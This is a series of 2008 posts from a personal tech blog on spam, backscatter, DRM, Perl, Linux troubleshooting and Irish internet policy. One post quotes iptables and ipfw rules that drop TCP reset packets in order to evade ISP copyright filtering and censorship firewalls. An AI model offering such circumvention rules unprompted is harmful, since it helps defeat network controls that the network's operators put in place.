Given that there are 46 kilocalories in a Jaffa Cake, 136 KCal means that every day, I can eat 3 Jaffa Cakes with impunity. Result! ;)

Also: some relevant commentary from Penny Arcade.

Google Calendar ‘Quick Add’ smart keyword bookmark

Published April 17, 2008

Google Calendar has a nifty feature, "Quick Add", where you can enter a natural-language string like "lunch with Justin, 1pm 20/4/08", it parses it, and adds an appointment to your calendar. However, the link in the Calendar UI can't be bookmarked; you have to go to the Calendar page, wait for it to sloooowly load all its AJAX bits, hit the link, and only then type the appointment details, by which time I've forgotten it anyway ADD-style. ;)

Elias Torrez came up with a Firefox extension to use the Quick Add feature in one keypress, but in my opinion that's overkill -- I don't want the overhead of another extension, the upgrade worries, and I don't want it using up a keyboard shortcut either. I'd prefer to just have this as a Firefox Smart Keyword -- and thankfully the trick is in the comments for his blog post, from someone called Bjorn. So here's the deal:

Name: Google Calendar Quick Add

Location: http://www.google.com/calendar/event?ctext=+%s+&action=TEMPLATE&pprop=HowCreated%3AQUICKADD
Keyword: newcal Description: add a new event in Google Calendar



enjoy!


		
				
			
								
					Downloadable movies and the DVP5960
				
				
    
		Published April 14, 2008	
	
			
			
				So Mulley mentions
that Moviestar.ie are planning to offer downloadable
movies.
Great concept, but I can guarantee the execution will be crap on a stick. :(

First off, the content available:


  'When the service goes live on 1 May, customers will be able to avail of
  content from several Irish producers including Network Ireland Television, as
  well as Video International’s film library which includes films like The Little
  Shop of Horrors.  The company is also seeking content from both the History and
  Biography Channels, which would mean a substantial back catalogue of
  documentary shows.'


Sorry, but: snore.

Secondly, the technology used:


  'Moviestar.ie content must be downloaded onto a PC or laptop but can then be
  transferred over to digital media players like the iPod Touch for viewing on
  the go. This service will be compatible with Apple Macs but only if the user
  downloads Windows Media Player.'


So in other words, it's Windows Media.  That means it won't play on my TV
through my MythTV box, on a USB stick
plugged into a Philips DVD player, on my Linux laptop, or even on a normal DVD player using a burned DVD.

Too little, too late.  Plenty of Irish consumers are already consuming
downloaded video -- as the popularity of the Philips DVP5960 demonstrates.   For legal video downloads to
work, they need to be somewhere remotely near as convenient and usable
as BitTorrent.

Using DRM is just falling down the same rabbit hole that swallowed up downloadable music for 5 years.  Nobody used that either, until gradually the companies involved realised that opening up was the only way to get customers, bringing us to where we are today -- legal downloads using the MP3 format.

BTW, I know that's the same DRM technology used by Channel 4's "4oD" download service.  Big deal -- I don't bother trying to watch that stuff either, for the same reasons.  If Channel 4 jumped off a cliff, would Moviestar.ie jump after them?



(By the way, that Philips DVD player
is a total success story.  That's a name-brand
hardware manufacturer, making a low-end,
$60
DVD player, with support for viewing downloaded XviD AVI movies on a USB stick.
Apparently it'll also play off USB hard disks, too.  It's immensely popular;
for example, here's a customer review of 10/10: "Best thing ever".  Several of my friends have them, and
praise them highly.  I'm coming up to DVD player replacement time, and I'm
planning to get one too.)


		
				
			
								
					Backscatter rising
				
				
    
		Published April 12, 2008	
	
			
			
				Recently, more and more people have been complaining about backscatter; its
levels seem to have increased over the past
few weeks.

If you're unfamiliar with the terminology -- backscatter is mail you didn't ask to receive, generated by legitimate, non-spam-sending systems in response to spam.  Here are some examples, courtesy of Al Iverson:


Misdirected bounces from spam runs, from mail servers who "accept then bounce" instead of rejecting mail during the SMTP transaction.
Misdirected virus/worm "OMG your mail was infected!" email notifications from virus scanners.
Misdirected "please confirm your subscription" requests from mailing lists that allow email-based signup requests.
Out of office or vacation autoreplies and autoresponders.
Challenge requests from "Challenge/Response" anti-spam software. Maybe C/R software works great for you, but it generates significant backscatter to people you don't know.


It used to be OK to send some of these types of mail -- but no longer.
Nowadays, due to the rise in backscatter caused by spammer/malware abuse, it is
no longer considered good practice to "accept then bounce" mail from an SMTP
session, or in any other way respond by mail to an unauthorized address of the
mail's senders.

Backscatter as spam delivery mechanism

I would hazard a guess that this rise is due to one of the major spam-sending botnets adopting the use of "real" sender addresses rather than randomly-generated fake ones, probably in order to evade broken-by-design Sender-Address
Verification filters.

There's an alternate theory that spammers use backscatter as a means of spam
delivery -- intending for the mails to bounce, in effect using the bounce
as the spam delivery mechanism.  Symantec's most recent "State of Spam" report in particular highlights this.

I don't buy it, however.  Compare their own example message -- here's what
the mail originally sent by the spammer to the bouncer, rendered:



And here's what it looks like once it passes through the bouncer's
mail system:



That's simply unreadable.  There's absolutely no way for a targeted
end user to read the "payload" there...

Getting rid of it

I haven't run into this recent spike in backscatter at all, myself, since I have a working setup that deals
with it.  This blog post
describes it.  If you're using Postfix and SpamAssassin, it would be well worth taking a look; if you're just using SpamAssassin and not Postfix, you should still try using the Virus Bounce Ruleset to rid yourself of various forms of unwanted bounce message.

Note that you need to set the 'whitelist_bounce_relays' setting to use
the ruleset, otherwise its rules will not fire.

SPF

There's a theory that setting SPF records (or other sender-auth mechanisms like DomainKeys or DKIM) on your domains, will reduce
the amount of backscatter sent to your domains.  Again, I doubt it.

Backscatter is being sent by old, legacy mail systems.  These systems
aren't configured to take SPF into account either.  When they're eventually
updated, it's likely they'll be fixed to simply not send "accept then
bounce" responses after the SMTP transaction has completed.  It's
unlikely that a system will be fixed to take SPF into account, but
not fixed to stop sending backscatter noise.

It's good advice to use these records anyway, but don't do it because you want to stop backscatter.

What about my own bounces?

You might be worried that the SpamAssassin VBounce ruleset will block bounces
sent in response to your own mail.  As long as the error conditions are flagged
during the SMTP transaction (as they should be nowadays), and you've specified
your own mailserver(s) in 'whitelist_bounce_relays', you're fine.


		
				
			
								
					Liability for internet banking fraud in Ireland
				
				
    
		Published April 11, 2008	
	
			
			
				Steven Murdoch at Light Blue Touchpaper notes that the UK banking code now includes wording to make the customer liable for losses attributable to them "acting without reasonable care", where "reasonable care" bizarrely includes installing anti-virus software on their PCs.

The Register also picked up on this, as did Brian Krebs in the Washington Post, comparing it with the vastly superior customer
protection offered by the US banks.

I was curious, so I went looking at the Irish situation.  Needless to say, it's not pretty.

I couldn't find anything in the Irish Banking Federation's Code Of Practice for Personal Customers, unfortunately.
However, AIB's terms and conditions for use of their Internet Banking product contain this:


  5 Transactions on the Account:
  
  5.1 The User authorises AIB to act upon any instruction to debit an Account received through AIB Phone & Internet Banking which has been transmitted using all or part of the Registration Number, PAC and/or any other authentication process which AIB may require to be used in connection with AIB Phone & Internet Banking (including but not limited to a Code Card) without requiring AIB to make any further authentication or enquiry, and all such debits shall constitute a liability of the User. Where the User's Account is maintained in joint names the liability of the Account Holders shall be joint and several.
  
  5.6 Entries in an Account in respect of Bill Payments, Fund Transfers and Top-Ups shall be prima facie evidence that the transfer or debit represented thereby has been duly authorised and shall be binding on AIB and the User unless and until proved to the contrary.
  
  6 International Payments:
  
  6.9 To the extent permitted by law, and notwithstanding anything to the contrary herein, AIB shall not be liable for, and shall be indemnified in full by the User against, any loss, damage or other liability that the User or AIB may suffer arising out of or in connection with the User’s use of the International Payment services (whether as the sender or receiver of an International Payment) unless such loss, damage or liability is caused by AIB’s fraud, wilful default or negligence.  In no circumstances will AIB be liable for any increased costs or expenses, or for any loss of profit, business, contracts, revenues or anticipated savings or for any special, indirect or consequential damage of any nature whatever.


As far as I can tell, basically the AIB have no liability here at all -- if a bad
guy gets hold of your PIN code and account number, and empties your account, tough
luck.

What about Bank of Ireland? It seems they agreed to refund phishing losses in an incident back in 2006.  But their
365online Terms and Conditions now say this:


  13  Indemnity
  
  13.2   Without prejudice to the generality of Clause 13.1 above, the Bank shall have no liability            whatsoever in respect of any loss suffered by the Customer as a result of their breach of            Clause 4 [jm: Security/Authentication] by way of knowingly, negligently or recklessly disclosing the Security Devices or            any of them.


So it's all pretty bad news for Irish banking customers.  This is pretty bad
news -- it's only a matter of time before Irish banks are targeted by a new
Banking Trojan, and
given that antivirus software has an 80% miss rate these
days, even having an up-to-date AV scanner isn't going to be much help.

My answer?  Don't do internet banking on Windows machines.
Simple as that.


		
				
			
								
					IIA’s nasty infection
				
				
    
		Published April 9, 2008	
	
			
			
				The Irish Internet Association have a weblog at blog.iia.ie. Back on January 30, this had a Technorati rank of 587893, with 21 inbound links from 14 blogs.  That's about what you'd expect -- comparable with Chris Horn's blog, for instance.

However, fast forward to today, and in the intervening 3 months, it seems to have suddenly shot up to 23,322 inbound links from 550 blogs, giving it a Technorati rank of 6,870.

To put that in perspective, that puts it comfortably in the top 3 in the Irish Blogs
Technorati Top 100 -- beating Damien Mulley's 7,859,
but just short of Donncha O'Caoimh's stellar 3,434 -- and
ahead of these other gods of the Irish blogosphere:


Tom Raftery (14,800, 9,224 links)
THE Graham Linehan (13,165)
Slugger O'Toole (17,279, 2,941 links)
Twenty Major (18,001)
Nialler9 (24,286)


Pretty impressive ;)

I was curious, so I went investigating.  Of those thousands of inbound links,
here's some samples of the most recent, pasted from the Technorati inbound
links page:


  barkingmoose
  
  Atacand Free instant online credit report Application credit card Cheap Paxil Does your credit score Household bank credit card application Apr for credit cards Buy Cephalexin? Aciphex Cheap Feldene Zovirax Risperdal Buy Naprosyn, Propecia Credit score codes Poor credit score, Propecia Uk Canada credit card online application Motrin Business credit score Cheap Cialis Jelly 50 Cent Free Ringtones Celexa How to improve my credit score Buy Inderal
  
  4 days ago in barkingmoose by barkingmoose · Authority: 3
  
  The Peninsula's Edge
  
  Jc penny credit card application Credit cards 1.99 apr ny Affect credit score For credit score American express credit card application Freee credit report Instant fleet 0 apr credit card application? Hydrocodone For low credit scores, No credit instant approval credit cards Annual creditreport.com, Tramadol Credit reporting service Configuration VPN Cheap credit reports. Buy Premarin Carisoprodol Soma Propecia Generic
  
  6 days ago in The Peninsula's Edge by ricsmith510 · Authority: 9
  
  The Incredible Blog
  
  Prepaid credit card uk Phentrimine Cheap Zovirax: Calan Highest credit score Ambien Valtrex: Ultram 3 credit reporting agencies Credit cards online application Instant approval student credit cards, Apr balance transfer credit cards Free government credit report Transunion free credit report Credit card debt bankruptcy? Propecia Propecia Uk! Correcting credit reports Cialis Uk Credit rating report Buy Synthroid Instant capital one 0 interest credit card application
  
  7 days ago in The Incredible Blog · Authority: 1
  
  Quilters' Blogs
  
  Annualcreditreport Instantly instant free online credit report Credit cards instant approval Guaranteed instant approval credit cards Lexapro Get my credit score, Card consolidation credit debt financial internet Chevron credit card services. Risperdal Lower credit card debt VPN connection One credit card application Xanax Viagra! Vasotec Diazepam Fix my credit report Credit report bureau. Cialis Soft Tabs! Ativan? Secured loans to increase credit score Cheap Amaryl Cheap Prednisone Alprazolam! Cheap
  7 days ago in Quilters' Blogs · Authority: 5
  
  TPN :: Martial Arts Explorer
  
  Luvox Credit score of Plavix 50 Cent Free Ringtones, Cheap Elavil? Free consumer credit report: Famvir Improve credit score fast Phentermine Online Zovirax Cialis Soft Tabs Apr for credit cards! Ultram Zoloft Credit card deal 0 Deltasone! VPN: Cheap Cardura Credit score rankings! Annual credit report .com Interest rate credit score: Carisoprodol Flagyl ER Online Cialis Soft Tabs Enable VPN 0 apr credit card application Free business credit report Ambien Low
  7 days ago in TPN :: Martial Arts Explorer · Authority: 56


Take a look at the 'inbound links' list -- thousands more just like that.

All of the affected blogs have been hacked to deliver these spam links.  They run unpatched versions of WordPress vulnerable to a major security hole.  On a casual visit, their
pages seem fine -- but "View Source", scroll to the bottom, and there are thousands of
spam links for drugs, ringtones, cheap credit, etc. on each one, exactly as
above, and as described by Kevin Burton in his description of the current epidemic of blog spam.

How did links to the IIA's blog wind up in this collection?

It's worth noting that the IIA's blog does not display the same symptoms -- the
links aren't present on their pages.

However, this post provided a good tip as to what
has happened.  Those infected blog pages point, in turn, to other infected blogs.  Somewhere within the IIA's blog setup, there's a page inserted
by a bad guy, collecting thousands of illicit links from thousands of other infected sites -- and sure enough, Irish Web Watcher found it on the IIA's site -- here it is.

Looks like the IIA have a pretty major disinfection job on their hands, and
urgently -- there's already a lot of spammy results appearing in the Google
index
from that site, and the next step after that is usually removal from the
index
once Google notice it.


		
				
			
								
					Google now include Code Search in normal results
				
				
    
		Published April 7, 2008	
	
			
			
				Latest Google curiosity... I hadn't spotted this before: it appears Google is
now including 'Code Snippet' results in the results for its normal search.  For
example, a search for XSLoader gives
this result:



The results highlighted on the page are for a local variable in
a Java module, rather than the much more common XSLoader perl module.  I guess 'Code Snippet' search is case-sensitive.


		
				
			
								
					RAII in perl
				
				
    
		Published April 2, 2008	
	
			
			
				Suppose you have matching start() and end() functions.  You want to ensure
that each start() is always matched with its corresponding end(), without
having to explicitly pepper your code with calls to that function.  Here's a
good way to do it in perl -- create a guard object:

package Scoper;
sub new {
  my $class = shift; bless({ func => shift },$class);
}
sub DESTROY {
  my $self = shift; $self->{func}->();
}


Here's an example of its use:

{
  start();
  my $s = Scoper->new(sub { end(); });
  [... do something...]
}
[at this point, end() has been called, even if a die() occurred]


The idea is simply to use DESTROY to perform whatever the cleanup operation is.
Once the $s object goes out of scope, it'll be deleted by perl's GC, in the process of which, calling $s->DESTROY().  In other words, it's using the GC for its own ends.

Unlike an eval { } block to catch die()s, this will even be called if exit() or POSIX::exit() is called.  (POSIX::_exit(), however, skips DESTROY.)

This is a pretty old C++ pattern -- Resource Acquisition Is
Initialization.
C++'s auto_ptr template class is the
best-known example in that language.   Here's a perl.com article on its use in
perl,
from last year, mostly regarding the CPAN module
Object::Destroyer.
To be honest, though, it's 6 lines of code -- not sure if that warrants
a CPAN module! ;)

RAII is used in SpamAssassin, in the Mail::SpamAssassin::Util::ScopedTimer class.


		
				
			
								
					“What’s New” archaeology
				
				
    
		Published March 31, 2008	
	
			
			
				jwz has, incredibly, resurrected
home.mcom.com, the WWW site of the Mosaic
Communications Corporation, as it was circa Oct 1994.

Edmund Roche-Kelly was kind enough to get in touch and note this link --
http://home.mcom.com/home/whatsnew/whats_new_0993.html:


  September 3, 1993
  
  IONA Technologies (whose product, Orbix, is the first full and complete implementation of the Object Management Group's Common Object Request Broker Architecture, or CORBA) is now running a Web server.
  
  An online pamphlet on the Church of the SubGenius is now available.


Guess who was responsible for those two ;)

I was, indeed, running the IONA web server -- it was set up in June
1993, and ran Plexus, a HTTP server written in Perl.  IONA's server
was somewhere around public web server number 70, world-wide.

The SubGenius pamphlet is still intact, btw, although at a more modern,
"hyplan"-less URL these days.  It'll be 15
years old in 6 months... how time flies!


		
				
			
								
					Sharing, not consuming, news
				
				
    
		Published March 28, 2008	
	
			
			
				The New York Times yesterday had a great article about modern news consumption:


  According to interviews and recent surveys, younger voters tend to be not just consumers of news and current events but conduits as well — sending out e-mailed links and videos to friends and their social networks. And in turn, they rely on friends and online connections for news to come to them. In essence, they are replacing the professional filter — reading The Washington Post, clicking on CNN.com — with a social one.
  
  “There are lots of times where I’ll read an interesting story online and send the URL to 10 friends,” said Lauren Wolfe, 25, the president of College Democrats of America. “I’d rather read an e-mail from a friend with an attached story than search through a newspaper to find the story.”
  
  [Jane Buckingham, the founder of the Intelligence Group, a market research company] recalled conducting a focus group where one of her subjects, a college student, said, “If the news is that important, it will find me.”


In other words, as Techdirt put it, this generation of news readers now focuses on sharing the news, rather than just consuming it -- and if you want to share a news story, there's no point passing on a subscription-only URL that your friends and contacts cannot read.

What newspapers need to do to remain relevant for this generation of news consumers is not to hide their content behind paywalls and registration-required screens.  The Guardian got their heads around this a few years back, and have come along in leaps and bounds since then.  I wonder if the Irish Times is listening?


		
				
			
								
					converting TAP output to JUnit-style XML
				
				
    
		Published March 26, 2008	
	
			
			
				Here's a perl script that may prove useful:
tap-to-junit-xml...

NAME

tap-to-junit-xml - convert perl-style TAP test output to JUnit-style XML

SYNOPSIS

tap-to-junit-xml "test suite name" [ outputprefix ] < tap_output.log


DESCRIPTION

Parse test suite output in TAP (Test Anything Protocol) format, and produce XML output in a similar format to that produced by the <junit> ant task.  This is useful for consumption by continuous-integration systems like Hudson.

Written in perl, requires TAP::Parser and XML::Generator.  It's based on junit_xml.pl by Matisse Enzer, although pretty much entirely rewritten.


		
				
			
								
					SpamAssassin thresholds again
				
				
    
		Published March 25, 2008	
	
			
			
				Following on from this post, I came
across a great graphing Flash applet from amCharts
which is ideal for putting a much improved UI on those SpamAssassin 'required_score' threshold line charts.

Here's the result -- nice, zoomable,
dynamic charts, displaying the effectiveness of various 'required_score'
thresholds depending on whether Bayes and network rules are active in your
SpamAssassin configuration.  Very cool!


		
				
			
								
					Pulseaudio ate my wifi
				
				
    
		Published March 21, 2008	
	
			
			
				I've just spent a rather frustrating morning attempting to debug
major performance problems with my home wireless network; one of my
machines couldn't associate with the AP at all anymore, and the
laptop (which was upstairs in the home office, for a change) was
getting horrific, sub-dialup speeds.

I did lots of moving of Linksys APs and tweaking of "txpower" settings,
without much in the way of results.  Cue tearing hair out etc.

Eventually, I logged into the OpenWRT AP over SSH, ran iftop to see what
clients were using the wifi, and saw that right at the top, chewing up all the
available bandwidth, was a multicast group called 224.0.0.56.  The culprit!
There was nothing wrong with the wifi setup after all -- the problem was
massive bandwidth consumption, crowding out all other traffic.

You see, "pulseaudio", the new Linux sound
server, has a very nifty feature -- streaming of music to any number of
listeners, over RTP.
This is great.  What's not so great is that this seems to have magically turned itself on, and was broadcasting UDP traffic over multicast on my wifi network, which didn't have enough bandwidth to host it.

Here's how to turn this off without killing "pulseaudio".  Start "paman", the PulseAudio Manager, and open the "Devices" tab:



(click on the image to view separately, if it's partly obscured.)

Select the "RTP Monitor Stream" in the "Sources" list, and open "Properties":



Hit the "Kill" button, and your network is back to normal.  Phew.

Another (quicker) way to do this, is using the command-line "pacmd" tool:

echo kill-source-output 0 | pacmd


It's a mystery where this is coming from, btw.  Here's what "paman" says it
came from:



But I don't seem to have an active 'module-rtp-send' line in my configuration:

: jm 98...; grep module-rtp-send /etc/pulse/* /home/jm/.pulse*
/etc/pulse/default.pa:#load-module module-rtp-send source=rtp.monitor


Curious.  And irritating.

Update: it turns out there's another source of configuration -- GConf.  "paprefs" can be used to examine that, and that's where the setting had been set, undoubtedly by me hacking about at some stage. :(


		
				
			
								
					more crap from St. Petersburg
				
				
    
		Published March 19, 2008	
	
			
			
				Noted with alarm in this comment regarding the horrific privacy-invading adware that is Phorm:


  Their programmers are mostly Saint Petersburg-based, home to the Russian Business Network.  Their servers are kept only in Saint Petersburg and China, so no ISP customer data is ever stored in the UK. Any personally identifying information they obtain about UK citizens can never be seen or purged using existing UK Data Protection Laws.


St. Petersburg is turning out to be quite a source of online nastiness -- the new Boca Raton.


		
				
			
								
					Evading Audible Magic’s Copysense filtering
				
				
    
		Published March 12, 2008	
	
			
			
				As I noted on Monday, the
Irish branches of several major record companies have brought a case against
Eircom, demanding in part that the ISP install Audible Magic's Copysense anti-filesharing appliances on their network infrastructure.

I thought I'd do a quick bit of research online into how they do their filtering.
Here's what the EFF had to say:


  Audible Magic's technology can easily be defeated by using one-time session
  key encryption (e.g., SSL) or by modifying the behavior of the network stack
  to ignore RST packets.


It's interesting to see that they used RST packets -- this is the same mechanism
used by the "Great Firewall of China" to censor the internet:


  the keyword detection is not actually being done in large routers on the
  borders of the Chinese networks, but in nearby subsidiary machines. When
  these machines detect the keyword, they do not actually prevent the packet
  containing the keyword from passing through the main router (this would be
  horribly complicated to achieve and still allow the router to run at the
  necessary speed). Instead, these subsiduary machines generate a series of TCP
  reset packets, which are sent to each end of the connection. When the resets
  arrive, the end-points assume they are genuine requests from the other end to
  close the connection — and obey. Hence the censorship occurs.


But there's a very easy way to avoid this, according to that blog post:


  However, because the original packets are passed through the firewall
  unscathed, if both of the endpoints were to completely ignore the firewall’s
  reset packets, then the connection will proceed unhindered! We’ve done some
  real experiments on this — and it works just fine!! Think of it as the Harry
  Potter approach to the Great Firewall — just shut your eyes and walk onto
  Platform 9¾.


Clayton, Murdoch, and Watson's paper on this technique provides the Linux and FreeBSD firewall commands they used to do this. Here's Linux:

   iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP


For FreeBSD, the command is:

   ipfw add 1000 drop tcp from any to me tcpflags rst in


So assuming Copysense haven't changed their approach yet, it's trivial to
block Copysense's filtering, if both ends are running Linux or BSD.  I predict
if Copysense becomes widespread, someone will patch Windows TCP to do the same.

I love Audible Magic's response:


  The current appliance happens to use the TCP Reset to accomplish this today.
  There are many other technical methods of blocking transfers. Again, we have
  strategies to deal with them should they ever prove necessary. This is why we
  recommend our customers purchase a software support agreement which provides
  for these enhancements that keep their purchase up-to-date and protect their
  investment.


in other words, "hey customers! if you don't have a support contract, you're
shit out of luck when the p2p guys get around our filters!"  Nice. ;)


		
				
			
								
					Vim hanging while running VMWare: fixed
				
				
    
		Published March 12, 2008	
	
			
			
				I've just fixed a bug on my linux desktop which had been annoying me for a
while.  Since there seems to be little online written about it, here's a blog
post to help future Googlers.

Here's the symptoms: while you're running VMWare, your
Vim editing sessions freeze up for 20 seconds or so,
roughly every 5 minutes.  The editor is entirely hung.

If you strace -p the process ID before the hang occurs, you'll see
something like this:

select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
_llseek(7, 4096, [4096], SEEK_SET)      = 0
write(7, "tp\21\0\377\0\0\0\2\0\0\0|\0\0\0\1\0\0\0\1\0\0\0\6\0\0"..., 4096) = 4096
ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost -isig -icanon -echo ...}) = 0
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
_llseek(7, 20480, [20480], SEEK_SET)    = 0
write(7, "ad\0\0\245\4\0\0\341\5\0\0\0\20\0\0J\0\0\0\250\17\0\0\247"..., 4096) = 4096
ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost -isig -icanon -echo ...}) = 0
select(6, [0 3 5], NULL, [0 3], {0, 0}) = 0 (Timeout)
fsync(


In other words, the hung process is sitting in an
fsync() call, attempting to flush changed data
for the current file to disk.

Investigation threw up the following: a kerneltrap thread about disk activity, poor responsiveness with Firefox 3.0b3 on linux, and a VIM bug report regarding this feature interfering with laptop-mode and spun-down hard disks.

VMWare must be issuing lots of unsynced I/O, so when Vim issues its fsync() or sync()
call, it needs to wait for the VMWare I/O to complete before it can return -- even though
the machine is otherwise idle. A bit of a Linux kernel (or specifically, ext3) misfeature, it seems.

Synthesising details from those threads comes up with this fix: edit your ~/.vimrc and add the following lines --

set swapsync=
set nofsync


This will inhibit use of both fsync() and sync() by Vim, and the problem is avoided nicely.

Update: one of the Firefox developers discusses how this affects FF 3.0.


		
				
			
								
					Irish ISPs in record company crosshairs
				
				
    
		Published March 11, 2008	
	
			
			
				RTE reports that 4 record companies, EMI, Sony BMG, Universal Music and Warner Music, have brought a High Court action to compel Eircom -- Ireland's largest ISP -- to prevent its networks being used for the illegal downloading of music:


  Willie Kavanagh, Managing Director of EMI Ireland and chairman of IRMA, said because of illegal downloading and other factors, the Irish music industry was experiencing a "dramatic and accelerating decline" in income. He said sales in the Irish market dropped 30% in the six years up to 2007.
  
  EMI and the other companies are challenging Eircom's refusal to use filtering technology or other measures to voluntarily block or filter illegally downloaded material. Last October Eircom told the companies it was not in a position to use the filtering software.


(I wonder if those dropping sales in the Irish market comprise only CDs sold by Irish shops?  2001 to 2007 is also the time period when physical sales have given way to online shopping on a gigantic scale, especially for music.)

The Irish Times coverage includes another interesting factoid, which appears in a lot of press regarding this case:


  Latest figures available, for 2006, indicate that 20 billion music files were illegally downloaded worldwide that year. The music industry estimates that for every single legal download, there are 20 illegal ones.


A little research reveals that that figure comes from the IFPI Digital Music
Report 2008.  I'd
have a totally different take on it, however. In my opinion, the figure is
probably correct, but not for the reasons the IFPI want them to be.  There are
a number of factors:


it's bloody hard to buy legit MP3s online.  You can buy all sorts of shitty
DRM-laden formats, or rent access to files that
"expire", or buy MP3s in certain
jurisdictions but not in others, or on certain
platforms.  So this is the main reason, in my
opinion, why legit music downloads are a lot lower than they could be --
because it's tricky to get a legit download!

By contrast it's a lot easier to log in to a filesharing service and download
high-quality, DRM-free MP3s. Consumers have indicated that DRM
frustrations drive them to filesharing
sites, and no less than
the Executive Vice President of the MPAA recognises
this.  (It looks like the IFPI dispute this, however.)
people, given the opportunity, tend to download free music, whether or not they plan to listen to it.  It could be called the "radio effect"; they might listen to it, or they might not, there's no pressure.  If they have to pay for it, however, they'll only download the stuff they really want.  I definitely noticed this when the legal download site EMusic switched from an "all you can eat" model to a certain number of files per month; I immediately stopped downloading tunes speculatively, and restricted myself just to the ones I had already decided I wanted.
on BitTorrent filesharing sites, downloaders need to maintain high sharing ratios -- so they download files just in order to re-upload them, regardless of whether they want them or not. (so I'm told. ;)


There's more commentary on the 20-to-1 figure here.

The IFPI Digital Music Report 2008 also notes:


  “2007 was the year ISP responsibility started to become an accepted principle. 2008 must be the year it becomes reality”
  
  Governments are starting to accept that Internet Service Providers (ISPs) should take a far bigger role in protecting music on the internet, but urgent action is needed to translate this into reality, a new report from the international music industry says today.
  
  ISP cooperation, via systematic disconnection of infringers and the use of filtering technologies, is the most effective way copyright theft can be controlled. Independent estimates say up to 80 per cent of ISP traffic comprises distribution of copyright-infringing files.
  
  The IFPI Digital Music Report 2008 points to French President Sarkozy’s November 2007 plan for ISP cooperation in fighting piracy as a groundbreaking example internationally. Momentum is also gathering in the UK, Sweden and Belgium. The report calls for legislative action by the European Union and other governments where existing discussions between the music industry and record companies fail to progress.


So it seems Ireland is the vanguard of an international effort by IFPI members to force ISPs to install filtering, worldwide.  It seems the same happened in Belgium last year -- and I reckon there'll be similar cases elsewhere soon.

Either way, I doubt this will be good for Irish internet users.

(PS: while I'm talking about buying MP3s online -- a quick plug for 7digital.  Last time I used them, I had a pretty crappy experience, but the situation is a lot better nowadays.  They now have a great website that works perfectly in Firefox on Linux; they sell brand new releases like the Hercules and Love Affair album as 320kbps DRM-free MP3s; they support PayPal payments; and downloads are fast and simple -- right click, "Save As".  hooray!)

Some other blog coverage: Lex Ferenda with some details about the legal situation, and Jim Carroll.

Update: EMI Ireland seem to be singing from a different hymn-sheet than their head office... interesting.

Update 2: I've taken a look at the Copysense filtering technology, and how it can be evaded.


		
				
			
								
					Announcing IrishPulse
				
				
    
		Published March 6, 2008	
	
			
			
				As I previously threatened, I've
gone ahead and created a "Microplanet" for Irish twitterers, similar to
Portland's Pulse of PDX -- an aggregator of the
"stream of consciousness" that comes out of our local Twitter community: IrishPulse.

Here's what you can do:

Add yourself: if you're an Irish Twitter user, follow the user 'irishpulse'.  This will add you to the sources list.

Publicise it: feel free to pass on the URL to other Irish Twitter users, and blog about it.

Read it: bookmark and take a look now and again!

In terms of implementation, it's just a (slightly patched) copy of
Venus and a perl script using
Net::Twitter to generate an OPML file
of the Twitter followers.  Here's the source.  I'd love to see more "Pulse" sites using this...


		
				
			
								
					Google’s CAPTCHA – not entirely broken after all?
				
				
    
		Published March 5, 2008	
	
			
			
				A couple of weeks ago, WebSense posted this article with details of a spammer's attack on Google's CAPTCHA puzzle, using web services running on two centralized servers:


  [...] It is observed that two separate hosts active on same domain are contacted during the entire process. These two hosts work collaboratively during the CAPTCHA break process. [...]
  
  Why [use 2 hosts]? Because of variations included in the Google CAPTCHA image, chances are that host 1 may fail breaking the code. Hence, the spammers have a backup or second CAPTCHA-learning host 2 that tries to learn and break the CAPTCHA code. However, it is possible that spammers also use these two hosts to check the efficiency and accuracy of both hosts involved in breaking one CAPTCHA code at a time, with the ultimate goal of having a successful CAPTCHA breaking process.
  
  To be specific, host 1 has a similar concept that was used to attack Live mail CAPTCHA. This involved extracting an image from a victim’s machine in the form of a bitmap file, bearing BM.. file headers and breaking the code. Host 2 uses an entirely different concept wherein the CAPTCHA image is broken into segments and then sent as a portable image / graphic file  bearing  PV..X file headers as requests. [...]


While it doesn't say as such, some have read the post to mean that Google's CAPTCHA has been solved algorithmically.  I'm pretty sure this isn't the case.  Here's why.

Firstly, the FAQ text that appears on "host 1" (thanks Alex for the improved translation!):




  FAQ
  
  If you cannot recognize the image or if it doesn’t load (a black or empty image gets displayed), just press Enter.
  
  Whatever happens, do not enter random characters!!!
  
  If there is a delay in loading images, exit from your account, refresh the page, and log in again.
  
  The system was tested in the following browsers: Internet Explorer Mozilla Firefox
  
  Before each payment, recognized images are checked by the admin. We pay only for correctly recognized images!!!
  
  Payment is made once per 24 hours. The minimum payment amount is $3. To request payment, send your request to the admin by ICQ. If the admin is free, your request will be processed within 10-15 minutes, and if he is busy, it will be processed as soon as possible.
  
  If you have any problems (questions), ICQ the admin.


That reads to me a lot like instructions to human "CAPTCHA farmers", working as a distributed team via a web interface.

Secondly, take a look at the timestamps in this packet trace:



The interesting point is that there's a 40-second gap between the invocation on "Captcha breaking host 1" and the invocation on "Captcha breaking host 2".  There is then a short gap of 5 seconds before the invocations occur on the Gmail websites.

Here's my theory: "host 1" is a web service gateway, proxying for a farm of human CAPTCHA solvers. "host 2", however, is an algorithm-driven server, with no humans involved.  A human may take 40 seconds to solve a CAPTCHA, but pure code should be a lot speedier.

Interesting to note that they're running both systems in parallel, on the same data.  By doing this, the attackers can


collect training data for a machine-learning algorithm (this is implied by the 'do not enter random characters!' warning from the FAQ -- they don't want useless training data)
collect test cases for test-driven development of improvements to the algorithm
measure success/failure rates of their algorithms, "live", as the attack progresses


Worth noting this, too:


  Observation*: On average, only 1 in every 5 CAPTCHA breaking requests are successfully including both algorithms used by the bot, approximating a success rate of 20%. The second algorithm (segmentation) has very poor performance that sometimes totally fails and returns garbage or incorrect answers.


So their algorithm is unreliable, and hasn't yet caught up with the human farmers.  Good news for Google -- and for the CAPTCHA farmers of Romania ;)

Update: here's the NYTimes' take, with broadly agreeing comments from Brad Taylor of Google.  (The Register coverage
is off-base, however.)


		
				
			
								
					On the effects of lowering your SpamAssassin threshold
				
				
    
		Published February 29, 2008	
	
			
			
